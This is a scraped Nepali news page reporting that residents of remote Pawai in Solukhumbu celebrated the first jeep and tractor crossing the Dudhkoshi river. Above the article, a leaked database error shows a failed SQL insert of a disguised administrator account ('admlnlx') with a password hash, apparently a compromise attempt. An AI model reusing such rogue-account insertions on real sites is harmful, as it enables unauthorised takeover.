WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BBrPWwWKriI31lEgC2jE.DrJ2DNB42.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 03:22:05', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
कोसीपारी पहिलोपटक जिप र ट्र्याक्टर पुग्दा खुसीयाली – Gaule Khabar

कोसीपारी पहिलोपटक जिप र ट्र्याक्टर पुग्दा खुसीयाली

कोसीपारी पहिलोपटक जिप र ट्र्याक्टर पुग्दा खुसीयाली

सोलुखुम्बु, फागुन ६–

सोलुखुम्बुको अत्यन्तै विकट क्षेत्र कोसीपारीका गाउँमा पहिलोपटक सडक यातायातको साधन पुग्दा स्थानीयवासीले खुसीयाली मनाएका छन् ।

आज दूधकोसीको दिप्लीघाटबाट तारेर पावै गाविसमा एउटा जिप र एउटा ट्र्याक्टर पु¥याएपछि स्थानीयवासीले सवारीसाधन तथा चालकलाई फूलमाला र अबीर लगाउनुको साथै नाचगानसमेत गरेका थिए ।

केही महिनाअघि सोही दिप्लीघाटबाट पारी गएर डोजरले पावै गाविसमा सडकको ट्र्याक खोलेपछि आज पहिलोपटक जिप र ट्र्याक्टर पारी तारिएको हो ।दूधकोसीभन्दा पारी रहेका र भौगोलिक रुपका अत्यन्तै विकट जिल्लाका वाकु, पावै, बुङ, छेस्काम, सोताङ र लोखिम गाविसका बासिन्दा सवारी साधन दूधकोसी तरेपछि खुसी भएका हुन् ।

जिप र ट्र्याक्टर कोसी तार्ने समारोहमा उपस्थित पावैका नीरज राईले आजको दिन कोसीपारीका बासिन्दाका लागि जीवनकै खुसीको दिन भएको बताउनुभयो ।- रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका